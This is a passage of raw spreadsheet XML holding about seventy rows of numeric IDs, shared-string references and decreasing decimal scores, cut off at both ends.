      <c r="F11047" s="2">
        <v>0.1990740740740741</v>
      </c>
    </row>
    <row r="11048" ht="15.75" customHeight="1">
      <c r="A11048" s="1">
        <v>19491.0</v>
      </c>
      <c r="B11048" s="2">
        <v>5.5863188E7</v>
      </c>
      <c r="C11048" s="2" t="s">
        <v>10589</v>
      </c>
      <c r="D11048" s="2">
        <v>1.0</v>
      </c>
      <c r="E11048" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11048" s="2">
        <v>0.1987847222222223</v>
      </c>
    </row>
    <row r="11049" ht="15.75" customHeight="1">
      <c r="A11049" s="1">
        <v>10127.0</v>
      </c>
      <c r="B11049" s="2">
        <v>5.7285074E7</v>
      </c>
      <c r="C11049" s="2" t="s">
        <v>10590</v>
      </c>
      <c r="D11049" s="2">
        <v>1.0</v>
      </c>
      <c r="E11049" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11049" s="2">
        <v>0.1983024691358025</v>
      </c>
    </row>
    <row r="11050" ht="15.75" customHeight="1">
      <c r="A11050" s="1">
        <v>9522.0</v>
      </c>
      <c r="B11050" s="2">
        <v>5.5977813E7</v>
      </c>
      <c r="C11050" s="2" t="s">
        <v>10591</v>
      </c>
      <c r="D11050" s="2">
        <v>1.0</v>
      </c>
      <c r="E11050" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11050" s="2">
        <v>0.1980392156862745</v>
      </c>
    </row>
    <row r="11051" ht="15.75" customHeight="1">
      <c r="A11051" s="1">
        <v>8541.0</v>
      </c>
      <c r="B11051" s="2">
        <v>5.4131101E7</v>
      </c>
      <c r="C11051" s="2" t="s">
        <v>10592</v>
      </c>
      <c r="D11051" s="2">
        <v>1.0</v>
      </c>
      <c r="E11051" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11051" s="2">
        <v>0.1979655712050079</v>
      </c>
    </row>
    <row r="11052" ht="15.75" customHeight="1">
      <c r="A11052" s="1">
        <v>32152.0</v>
      </c>
      <c r="B11052" s="2">
        <v>5.4279721E7</v>
      </c>
      <c r="C11052" s="2" t="s">
        <v>10593</v>
      </c>
      <c r="D11052" s="2">
        <v>1.0</v>
      </c>
      <c r="E11052" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11052" s="2">
        <v>0.1978114478114478</v>
      </c>
    </row>
    <row r="11053" ht="15.75" customHeight="1">
      <c r="A11053" s="1">
        <v>4617.0</v>
      </c>
      <c r="B11053" s="2">
        <v>4.2940179E7</v>
      </c>
      <c r="C11053" s="2" t="s">
        <v>10594</v>
      </c>
      <c r="D11053" s="2">
        <v>1.0</v>
      </c>
      <c r="E11053" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11053" s="2">
        <v>0.1965174129353234</v>
      </c>
    </row>
    <row r="11054" ht="15.75" customHeight="1">
      <c r="A11054" s="1">
        <v>9348.0</v>
      </c>
      <c r="B11054" s="2">
        <v>5.5661894E7</v>
      </c>
      <c r="C11054" s="2" t="s">
        <v>10595</v>
      </c>
      <c r="D11054" s="2">
        <v>1.0</v>
      </c>
      <c r="E11054" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11054" s="2">
        <v>0.1961279461279462</v>
      </c>
    </row>
    <row r="11055" ht="15.75" customHeight="1">
      <c r="A11055" s="1">
        <v>30089.0</v>
      </c>
      <c r="B11055" s="2">
        <v>3.6327659E7</v>
      </c>
      <c r="C11055" s="2" t="s">
        <v>10596</v>
      </c>
      <c r="D11055" s="2">
        <v>1.0</v>
      </c>
      <c r="E11055" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11055" s="2">
        <v>0.1961178045515395</v>
      </c>
    </row>
    <row r="11056" ht="15.75" customHeight="1">
      <c r="A11056" s="1">
        <v>5057.0</v>
      </c>
      <c r="B11056" s="2">
        <v>4.4347078E7</v>
      </c>
      <c r="C11056" s="2" t="s">
        <v>10597</v>
      </c>
      <c r="D11056" s="2">
        <v>1.0</v>
      </c>
      <c r="E11056" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11056" s="2">
        <v>0.1957994579945799</v>
      </c>
    </row>
    <row r="11057" ht="15.75" customHeight="1">
      <c r="A11057" s="1">
        <v>9617.0</v>
      </c>
      <c r="B11057" s="2">
        <v>5.6188312E7</v>
      </c>
      <c r="C11057" s="2" t="s">
        <v>10598</v>
      </c>
      <c r="D11057" s="2">
        <v>1.0</v>
      </c>
      <c r="E11057" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11057" s="2">
        <v>0.1953703703703704</v>
      </c>
    </row>
    <row r="11058" ht="15.75" customHeight="1">
      <c r="A11058" s="1">
        <v>6941.0</v>
      </c>
      <c r="B11058" s="2">
        <v>4.9924088E7</v>
      </c>
      <c r="C11058" s="2" t="s">
        <v>10599</v>
      </c>
      <c r="D11058" s="2">
        <v>1.0</v>
      </c>
      <c r="E11058" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11058" s="2">
        <v>0.1953125000000001</v>
      </c>
    </row>
    <row r="11059" ht="15.75" customHeight="1">
      <c r="A11059" s="1">
        <v>2813.0</v>
      </c>
      <c r="B11059" s="2">
        <v>3.5369822E7</v>
      </c>
      <c r="C11059" s="2" t="s">
        <v>10600</v>
      </c>
      <c r="D11059" s="2">
        <v>1.0</v>
      </c>
      <c r="E11059" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11059" s="2">
        <v>0.1948590381426203</v>
      </c>
    </row>
    <row r="11060" ht="15.75" customHeight="1">
      <c r="A11060" s="1">
        <v>19052.0</v>
      </c>
      <c r="B11060" s="2">
        <v>5.4578417E7</v>
      </c>
      <c r="C11060" s="2" t="s">
        <v>10601</v>
      </c>
      <c r="D11060" s="2">
        <v>1.0</v>
      </c>
      <c r="E11060" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11060" s="2">
        <v>0.1940639269406394</v>
      </c>
    </row>
    <row r="11061" ht="15.75" customHeight="1">
      <c r="A11061" s="1">
        <v>6403.0</v>
      </c>
      <c r="B11061" s="2">
        <v>4.8485112E7</v>
      </c>
      <c r="C11061" s="2" t="s">
        <v>10602</v>
      </c>
      <c r="D11061" s="2">
        <v>1.0</v>
      </c>
      <c r="E11061" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11061" s="2">
        <v>0.1936274509803922</v>
      </c>
    </row>
    <row r="11062" ht="15.75" customHeight="1">
      <c r="A11062" s="1">
        <v>27013.0</v>
      </c>
      <c r="B11062" s="2">
        <v>2.0013877E7</v>
      </c>
      <c r="C11062" s="2" t="s">
        <v>10603</v>
      </c>
      <c r="D11062" s="2">
        <v>1.0</v>
      </c>
      <c r="E11062" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11062" s="2">
        <v>0.1925287356321839</v>
      </c>
    </row>
    <row r="11063" ht="15.75" customHeight="1">
      <c r="A11063" s="1">
        <v>8963.0</v>
      </c>
      <c r="B11063" s="2">
        <v>5.4924984E7</v>
      </c>
      <c r="C11063" s="2" t="s">
        <v>10604</v>
      </c>
      <c r="D11063" s="2">
        <v>1.0</v>
      </c>
      <c r="E11063" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11063" s="2">
        <v>0.1923076923076924</v>
      </c>
    </row>
    <row r="11064" ht="15.75" customHeight="1">
      <c r="A11064" s="1">
        <v>8605.0</v>
      </c>
      <c r="B11064" s="2">
        <v>5.4267144E7</v>
      </c>
      <c r="C11064" s="2" t="s">
        <v>10605</v>
      </c>
      <c r="D11064" s="2">
        <v>1.0</v>
      </c>
      <c r="E11064" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11064" s="2">
        <v>0.1921675774134791</v>
      </c>
    </row>
    <row r="11065" ht="15.75" customHeight="1">
      <c r="A11065" s="1">
        <v>6248.0</v>
      </c>
      <c r="B11065" s="2">
        <v>4.810249E7</v>
      </c>
      <c r="C11065" s="2" t="s">
        <v>10606</v>
      </c>
      <c r="D11065" s="2">
        <v>1.0</v>
      </c>
      <c r="E11065" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11065" s="2">
        <v>0.1908212560386473</v>
      </c>
    </row>
    <row r="11066" ht="15.75" customHeight="1">
      <c r="A11066" s="1">
        <v>18721.0</v>
      </c>
      <c r="B11066" s="2">
        <v>5.3669548E7</v>
      </c>
      <c r="C11066" s="2" t="s">
        <v>10607</v>
      </c>
      <c r="D11066" s="2">
        <v>1.0</v>
      </c>
      <c r="E11066" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11066" s="2">
        <v>0.1905982905982906</v>
      </c>
    </row>
    <row r="11067" ht="15.75" customHeight="1">
      <c r="A11067" s="1">
        <v>31130.0</v>
      </c>
      <c r="B11067" s="2">
        <v>4889467.0</v>
      </c>
      <c r="C11067" s="2" t="s">
        <v>10608</v>
      </c>
      <c r="D11067" s="2">
        <v>1.0</v>
      </c>
      <c r="E11067" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11067" s="2">
        <v>0.1903594771241831</v>
      </c>
    </row>
    <row r="11068" ht="15.75" customHeight="1">
      <c r="A11068" s="1">
        <v>7867.0</v>
      </c>
      <c r="B11068" s="2">
        <v>5.2394503E7</v>
      </c>
      <c r="C11068" s="2" t="s">
        <v>10609</v>
      </c>
      <c r="D11068" s="2">
        <v>1.0</v>
      </c>
      <c r="E11068" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11068" s="2">
        <v>0.1901041666666667</v>
      </c>
    </row>
    <row r="11069" ht="15.75" customHeight="1">
      <c r="A11069" s="1">
        <v>4061.0</v>
      </c>
      <c r="B11069" s="2">
        <v>4.1134535E7</v>
      </c>
      <c r="C11069" s="2" t="s">
        <v>10610</v>
      </c>
      <c r="D11069" s="2">
        <v>1.0</v>
      </c>
      <c r="E11069" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11069" s="2">
        <v>0.1898839137645108</v>
      </c>
    </row>
    <row r="11070" ht="15.75" customHeight="1">
      <c r="A11070" s="1">
        <v>15325.0</v>
      </c>
      <c r="B11070" s="2">
        <v>4.2527151E7</v>
      </c>
      <c r="C11070" s="2" t="s">
        <v>10611</v>
      </c>
      <c r="D11070" s="2">
        <v>1.0</v>
      </c>
      <c r="E11070" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11070" s="2">
        <v>0.1896825396825397</v>
      </c>
    </row>
    <row r="11071" ht="15.75" customHeight="1">
      <c r="A11071" s="1">
        <v>4481.0</v>
      </c>
      <c r="B11071" s="2">
        <v>4.2502922E7</v>
      </c>
      <c r="C11071" s="2" t="s">
        <v>10612</v>
      </c>
      <c r="D11071" s="2">
        <v>1.0</v>
      </c>
      <c r="E11071" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11071" s="2">
        <v>0.189594356261023</v>
      </c>
    </row>
    <row r="11072" ht="15.75" customHeight="1">
      <c r="A11072" s="1">
        <v>575.0</v>
      </c>
      <c r="B11072" s="2">
        <v>1.9081698E7</v>
      </c>
      <c r="C11072" s="2" t="s">
        <v>10613</v>
      </c>
      <c r="D11072" s="2">
        <v>1.0</v>
      </c>
      <c r="E11072" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11072" s="2">
        <v>0.1894977168949772</v>
      </c>
    </row>
    <row r="11073" ht="15.75" customHeight="1">
      <c r="A11073" s="1">
        <v>4578.0</v>
      </c>
      <c r="B11073" s="2">
        <v>4.276667E7</v>
      </c>
      <c r="C11073" s="2" t="s">
        <v>10614</v>
      </c>
      <c r="D11073" s="2">
        <v>1.0</v>
      </c>
      <c r="E11073" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11073" s="2">
        <v>0.1886973180076628</v>
      </c>
    </row>
    <row r="11074" ht="15.75" customHeight="1">
      <c r="A11074" s="1">
        <v>16902.0</v>
      </c>
      <c r="B11074" s="2">
        <v>4.8089963E7</v>
      </c>
      <c r="C11074" s="2" t="s">
        <v>10615</v>
      </c>
      <c r="D11074" s="2">
        <v>1.0</v>
      </c>
      <c r="E11074" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11074" s="2">
        <v>0.1878306878306879</v>
      </c>
    </row>
    <row r="11075" ht="15.75" customHeight="1">
      <c r="A11075" s="1">
        <v>4900.0</v>
      </c>
      <c r="B11075" s="2">
        <v>4.39042E7</v>
      </c>
      <c r="C11075" s="2" t="s">
        <v>10616</v>
      </c>
      <c r="D11075" s="2">
        <v>1.0</v>
      </c>
      <c r="E11075" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11075" s="2">
        <v>0.1865079365079366</v>
      </c>
    </row>
    <row r="11076" ht="15.75" customHeight="1">
      <c r="A11076" s="1">
        <v>3628.0</v>
      </c>
      <c r="B11076" s="2">
        <v>3.9219355E7</v>
      </c>
      <c r="C11076" s="2" t="s">
        <v>10617</v>
      </c>
      <c r="D11076" s="2">
        <v>1.0</v>
      </c>
      <c r="E11076" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11076" s="2">
        <v>0.1861111111111111</v>
      </c>
    </row>
    <row r="11077" ht="15.75" customHeight="1">
      <c r="A11077" s="1">
        <v>18028.0</v>
      </c>
      <c r="B11077" s="2">
        <v>5.1532047E7</v>
      </c>
      <c r="C11077" s="2" t="s">
        <v>10618</v>
      </c>
      <c r="D11077" s="2">
        <v>1.0</v>
      </c>
      <c r="E11077" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11077" s="2">
        <v>0.1861111111111111</v>
      </c>
    </row>
    <row r="11078" ht="15.75" customHeight="1">
      <c r="A11078" s="1">
        <v>32168.0</v>
      </c>
      <c r="B11078" s="2">
        <v>5.4559824E7</v>
      </c>
      <c r="C11078" s="2" t="s">
        <v>10619</v>
      </c>
      <c r="D11078" s="2">
        <v>1.0</v>
      </c>
      <c r="E11078" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11078" s="2">
        <v>0.1861111111111111</v>
      </c>
    </row>
    <row r="11079" ht="15.75" customHeight="1">
      <c r="A11079" s="1">
        <v>5064.0</v>
      </c>
      <c r="B11079" s="2">
        <v>4.4372545E7</v>
      </c>
      <c r="C11079" s="2" t="s">
        <v>10620</v>
      </c>
      <c r="D11079" s="2">
        <v>1.0</v>
      </c>
      <c r="E11079" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11079" s="2">
        <v>0.1854700854700855</v>
      </c>
    </row>
    <row r="11080" ht="15.75" customHeight="1">
      <c r="A11080" s="1">
        <v>17678.0</v>
      </c>
      <c r="B11080" s="2">
        <v>5.048974E7</v>
      </c>
      <c r="C11080" s="2" t="s">
        <v>10621</v>
      </c>
      <c r="D11080" s="2">
        <v>1.0</v>
      </c>
      <c r="E11080" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11080" s="2">
        <v>0.1854460093896715</v>
      </c>
    </row>
    <row r="11081" ht="15.75" customHeight="1">
      <c r="A11081" s="1">
        <v>16221.0</v>
      </c>
      <c r="B11081" s="2">
        <v>4.5711611E7</v>
      </c>
      <c r="C11081" s="2" t="s">
        <v>10622</v>
      </c>
      <c r="D11081" s="2">
        <v>1.0</v>
      </c>
      <c r="E11081" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11081" s="2">
        <v>0.1854166666666667</v>
      </c>
    </row>
    <row r="11082" ht="15.75" customHeight="1">
      <c r="A11082" s="1">
        <v>18117.0</v>
      </c>
      <c r="B11082" s="2">
        <v>5.1763191E7</v>
      </c>
      <c r="C11082" s="2" t="s">
        <v>10623</v>
      </c>
      <c r="D11082" s="2">
        <v>1.0</v>
      </c>
      <c r="E11082" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11082" s="2">
        <v>0.1848816029143898</v>
      </c>
    </row>
    <row r="11083" ht="15.75" customHeight="1">
      <c r="A11083" s="1">
        <v>29700.0</v>
      </c>
      <c r="B11083" s="2">
        <v>3.433159E7</v>
      </c>
      <c r="C11083" s="2" t="s">
        <v>10624</v>
      </c>
      <c r="D11083" s="2">
        <v>1.0</v>
      </c>
      <c r="E11083" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11083" s="2">
        <v>0.1844135802469136</v>
      </c>
    </row>
    <row r="11084" ht="15.75" customHeight="1">
      <c r="A11084" s="1">
        <v>24673.0</v>
      </c>
      <c r="B11084" s="2">
        <v>1.1583695E7</v>
      </c>
      <c r="C11084" s="2" t="s">
        <v>10625</v>
      </c>
      <c r="D11084" s="2">
        <v>1.0</v>
      </c>
      <c r="E11084" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11084" s="2">
        <v>0.1842592592592593</v>
      </c>
    </row>
    <row r="11085" ht="15.75" customHeight="1">
      <c r="A11085" s="1">
        <v>19601.0</v>
      </c>
      <c r="B11085" s="2">
        <v>5.6182858E7</v>
      </c>
      <c r="C11085" s="2" t="s">
        <v>10626</v>
      </c>
      <c r="D11085" s="2">
        <v>1.0</v>
      </c>
      <c r="E11085" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11085" s="2">
        <v>0.1838235294117647</v>
      </c>
    </row>
    <row r="11086" ht="15.75" customHeight="1">
      <c r="A11086" s="1">
        <v>9200.0</v>
      </c>
      <c r="B11086" s="2">
        <v>5.5398084E7</v>
      </c>
      <c r="C11086" s="2" t="s">
        <v>10627</v>
      </c>
      <c r="D11086" s="2">
        <v>1.0</v>
      </c>
      <c r="E11086" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11086" s="2">
        <v>0.1837606837606838</v>
      </c>
    </row>
    <row r="11087" ht="15.75" customHeight="1">
      <c r="A11087" s="1">
        <v>14007.0</v>
      </c>
      <c r="B11087" s="2">
        <v>3.7392765E7</v>
      </c>
      <c r="C11087" s="2" t="s">
        <v>10628</v>
      </c>
      <c r="D11087" s="2">
        <v>1.0</v>
      </c>
      <c r="E11087" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11087" s="2">
        <v>0.1837606837606838</v>
      </c>
    </row>
    <row r="11088" ht="15.75" customHeight="1">
      <c r="A11088" s="1">
        <v>16901.0</v>
      </c>
      <c r="B11088" s="2">
        <v>4.8089963E7</v>
      </c>
      <c r="C11088" s="2" t="s">
        <v>10629</v>
      </c>
      <c r="D11088" s="2">
        <v>1.0</v>
      </c>
      <c r="E11088" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11088" s="2">
        <v>0.1831597222222223</v>
      </c>
    </row>
    <row r="11089" ht="15.75" customHeight="1">
      <c r="A11089" s="1">
        <v>17384.0</v>
      </c>
      <c r="B11089" s="2">
        <v>4.9571342E7</v>
      </c>
      <c r="C11089" s="2" t="s">
        <v>10630</v>
      </c>
      <c r="D11089" s="2">
        <v>1.0</v>
      </c>
      <c r="E11089" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11089" s="2">
        <v>0.1831597222222223</v>
      </c>
    </row>
    <row r="11090" ht="15.75" customHeight="1">
      <c r="A11090" s="1">
        <v>3448.0</v>
      </c>
      <c r="B11090" s="2">
        <v>3.8265687E7</v>
      </c>
      <c r="C11090" s="2" t="s">
        <v>10631</v>
      </c>
      <c r="D11090" s="2">
        <v>1.0</v>
      </c>
      <c r="E11090" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11090" s="2">
        <v>0.1830601092896175</v>
      </c>
    </row>
    <row r="11091" ht="15.75" customHeight="1">
      <c r="A11091" s="1">
        <v>7524.0</v>
      </c>
      <c r="B11091" s="2">
        <v>5.142861E7</v>
      </c>
      <c r="C11091" s="2" t="s">
        <v>10632</v>
      </c>
      <c r="D11091" s="2">
        <v>1.0</v>
      </c>
      <c r="E11091" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11091" s="2">
        <v>0.1830601092896175</v>
      </c>
    </row>
    <row r="11092" ht="15.75" customHeight="1">
      <c r="A11092" s="1">
        <v>28942.0</v>
      </c>
      <c r="B11092" s="2">
        <v>2.9646296E7</v>
      </c>
      <c r="C11092" s="2" t="s">
        <v>10633</v>
      </c>
      <c r="D11092" s="2">
        <v>1.0</v>
      </c>
      <c r="E11092" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11092" s="2">
        <v>0.1826599326599327</v>
      </c>
    </row>
    <row r="11093" ht="15.75" customHeight="1">
      <c r="A11093" s="1">
        <v>16277.0</v>
      </c>
      <c r="B11093" s="2">
        <v>4.5792575E7</v>
      </c>
      <c r="C11093" s="2" t="s">
        <v>10634</v>
      </c>
      <c r="D11093" s="2">
        <v>1.0</v>
      </c>
      <c r="E11093" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11093" s="2">
        <v>0.1824074074074074</v>
      </c>
    </row>
    <row r="11094" ht="15.75" customHeight="1">
      <c r="A11094" s="1">
        <v>4754.0</v>
      </c>
      <c r="B11094" s="2">
        <v>4.3394701E7</v>
      </c>
      <c r="C11094" s="2" t="s">
        <v>10635</v>
      </c>
      <c r="D11094" s="2">
        <v>1.0</v>
      </c>
      <c r="E11094" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11094" s="2">
        <v>0.1818873668188737</v>
      </c>
    </row>
    <row r="11095" ht="15.75" customHeight="1">
      <c r="A11095" s="1">
        <v>17406.0</v>
      </c>
      <c r="B11095" s="2">
        <v>4.9641634E7</v>
      </c>
      <c r="C11095" s="2" t="s">
        <v>10636</v>
      </c>
      <c r="D11095" s="2">
        <v>1.0</v>
      </c>
      <c r="E11095" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11095" s="2">
        <v>0.1815920398009951</v>
      </c>
    </row>
    <row r="11096" ht="15.75" customHeight="1">
      <c r="A11096" s="1">
        <v>7615.0</v>
      </c>
      <c r="B11096" s="2">
        <v>5.1711853E7</v>
      </c>
      <c r="C11096" s="2" t="s">
        <v>10637</v>
      </c>
      <c r="D11096" s="2">
        <v>1.0</v>
      </c>
      <c r="E11096" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11096" s="2">
        <v>0.181592039800995</v>
      </c>
    </row>
    <row r="11097" ht="15.75" customHeight="1">
      <c r="A11097" s="1">
        <v>6301.0</v>
      </c>
      <c r="B11097" s="2">
        <v>4.8224865E7</v>
      </c>
      <c r="C11097" s="2" t="s">
        <v>10638</v>
      </c>
      <c r="D11097" s="2">
        <v>1.0</v>
      </c>
      <c r="E11097" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11097" s="2">
        <v>0.1815476190476192</v>
      </c>
    </row>
    <row r="11098" ht="15.75" customHeight="1">
      <c r="A11098" s="1">
        <v>17138.0</v>
      </c>
      <c r="B11098" s="2">
        <v>4.882972E7</v>
      </c>
      <c r="C11098" s="2" t="s">
        <v>10639</v>
      </c>
      <c r="D11098" s="2">
        <v>1.0</v>
      </c>
      <c r="E11098" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11098" s="2">
        <v>0.1812386156648452</v>
      </c>
    </row>
    <row r="11099" ht="15.75" customHeight="1">
      <c r="A11099" s="1">
        <v>8879.0</v>
      </c>
      <c r="B11099" s="2">
        <v>5.4765684E7</v>
      </c>
      <c r="C11099" s="2" t="s">
        <v>10640</v>
      </c>
      <c r="D11099" s="2">
        <v>1.0</v>
      </c>
      <c r="E11099" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11099" s="2">
        <v>0.1807017543859649</v>
      </c>
    </row>
    <row r="11100" ht="15.75" customHeight="1">
      <c r="A11100" s="1">
        <v>16813.0</v>
      </c>
      <c r="B11100" s="2">
        <v>4.781841E7</v>
      </c>
      <c r="C11100" s="2" t="s">
        <v>10641</v>
      </c>
      <c r="D11100" s="2">
        <v>1.0</v>
      </c>
      <c r="E11100" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11100" s="2">
        <v>0.1805555555555556</v>
      </c>
    </row>
    <row r="11101" ht="15.75" customHeight="1">
      <c r="A11101" s="1">
        <v>24881.0</v>
      </c>
      <c r="B11101" s="2">
        <v>1.2235347E7</v>
      </c>
      <c r="C11101" s="2" t="s">
        <v>10642</v>
      </c>
      <c r="D11101" s="2">
        <v>1.0</v>
      </c>
      <c r="E11101" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11101" s="2">
        <v>0.1805555555555556</v>
      </c>
    </row>
    <row r="11102" ht="15.75" customHeight="1">
      <c r="A11102" s="1">
        <v>15966.0</v>
      </c>
      <c r="B11102" s="2">
        <v>4.478792E7</v>
      </c>
      <c r="C11102" s="2" t="s">
        <v>10643</v>
      </c>
      <c r="D11102" s="2">
        <v>1.0</v>
      </c>
      <c r="E11102" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11102" s="2">
        <v>0.17984934086629</v>
      </c>
    </row>
    <row r="11103" ht="15.75" customHeight="1">
      <c r="A11103" s="1">
        <v>18231.0</v>
      </c>
      <c r="B11103" s="2">
        <v>5.2108671E7</v>
      </c>
      <c r="C11103" s="2" t="s">
        <v>10644</v>
      </c>
      <c r="D11103" s="2">
        <v>1.0</v>
      </c>
      <c r="E11103" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11103" s="2">
        <v>0.1796875</v>
      </c>
    </row>
    <row r="11104" ht="15.75" customHeight="1">
      <c r="A11104" s="1">
        <v>9809.0</v>
      </c>
      <c r="B11104" s="2">
        <v>5.6593369E7</v>
      </c>
      <c r="C11104" s="2" t="s">
        <v>10645</v>
      </c>
      <c r="D11104" s="2">
        <v>1.0</v>
      </c>
      <c r="E11104" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11104" s="2">
        <v>0.1792929292929293</v>
      </c>
    </row>
    <row r="11105" ht="15.75" customHeight="1">
      <c r="A11105" s="1">
        <v>8077.0</v>
      </c>
      <c r="B11105" s="2">
        <v>5.3011328E7</v>
      </c>
      <c r="C11105" s="2" t="s">
        <v>10646</v>
      </c>
      <c r="D11105" s="2">
        <v>1.0</v>
      </c>
      <c r="E11105" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11105" s="2">
        <v>0.1787749287749288</v>
      </c>
    </row>
    <row r="11106" ht="15.75" customHeight="1">
      <c r="A11106" s="1">
        <v>8002.0</v>
      </c>
      <c r="B11106" s="2">
        <v>5.2782998E7</v>
      </c>
      <c r="C11106" s="2" t="s">
        <v>10647</v>
      </c>
      <c r="D11106" s="2">
        <v>1.0</v>
      </c>
      <c r="E11106" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11106" s="2">
        <v>0.1783625730994153</v>
      </c>
    </row>
    <row r="11107" ht="15.75" customHeight="1">
      <c r="A11107" s="1">
        <v>16088.0</v>
      </c>
      <c r="B11107" s="2">
        <v>4.5386471E7</v>
      </c>
      <c r="C11107" s="2" t="s">
        <v>10648</v>
      </c>
      <c r="D11107" s="2">
        <v>1.0</v>
      </c>
      <c r="E11107" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11107" s="2">
        <v>0.1783625730994153</v>
      </c>
    </row>
    <row r="11108" ht="15.75" customHeight="1">
      <c r="A11108" s="1">
        <v>11480.0</v>
      </c>
      <c r="B11108" s="2">
        <v>2.199227E7</v>
      </c>
      <c r="C11108" s="2" t="s">
        <v>10649</v>
      </c>
      <c r="D11108" s="2">
        <v>1.0</v>
      </c>
      <c r="E11108" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11108" s="2">
        <v>0.17831541218638</v>
      </c>
    </row>
    <row r="11109" ht="15.75" customHeight="1">
      <c r="A11109" s="1">
        <v>17247.0</v>
      </c>
      <c r="B11109" s="2">
        <v>4.9090342E7</v>
      </c>
      <c r="C11109" s="2" t="s">
        <v>10650</v>
      </c>
      <c r="D11109" s="2">
        <v>1.0</v>
      </c>
      <c r="E11109" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11109" s="2">
        <v>0.177951388888889</v>
      </c>
    </row>
    <row r="11110" ht="15.75" customHeight="1">
      <c r="A11110" s="1">
        <v>16095.0</v>
      </c>
      <c r="B11110" s="2">
        <v>4.5386812E7</v>
      </c>
      <c r="C11110" s="2" t="s">
        <v>10651</v>
      </c>
      <c r="D11110" s="2">
        <v>1.0</v>
      </c>
      <c r="E11110" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11110" s="2">
        <v>0.177927927927928</v>
      </c>
    </row>
    <row r="11111" ht="15.75" customHeight="1">
      <c r="A11111" s="1">
        <v>8431.0</v>
      </c>
      <c r="B11111" s="2">
        <v>5.3944949E7</v>
      </c>
      <c r="C11111" s="2" t="s">
        <v>10652</v>
      </c>
      <c r="D11111" s="2">
        <v>1.0</v>
      </c>
      <c r="E11111" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11111" s="2">
        <v>0.1772486772486773</v>
      </c>
    </row>
    <row r="11112" ht="15.75" customHeight="1">
      <c r="A11112" s="1">
        <v>19158.0</v>
      </c>
      <c r="B11112" s="2">
        <v>5.4898307E7</v>
      </c>
      <c r="C11112" s="2" t="s">
        <v>10653</v>
      </c>
      <c r="D11112" s="2">
        <v>1.0</v>
      </c>
      <c r="E11112" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11112" s="2">
        <v>0.1772486772486773</v>
      </c>
    </row>
    <row r="11113" ht="15.75" customHeight="1">
      <c r="A11113" s="1">
        <v>19213.0</v>
      </c>
      <c r="B11113" s="2">
        <v>5.4988421E7</v>
      </c>
      <c r="C11113" s="2" t="s">
        <v>10654</v>
      </c>
      <c r="D11113" s="2">
        <v>1.0</v>
      </c>
      <c r="E11113" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11113" s="2">
        <v>0.1772486772486773</v>
      </c>
    </row>
    <row r="11114" ht="15.75" customHeight="1">
      <c r="A11114" s="1">
        <v>21184.0</v>
      </c>
      <c r="B11114" s="2">
        <v>1.9207086E7</v>
      </c>
      <c r="C11114" s="2" t="s">
        <v>10655</v>
      </c>
      <c r="D11114" s="2">
        <v>1.0</v>
      </c>
      <c r="E11114" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11114" s="2">
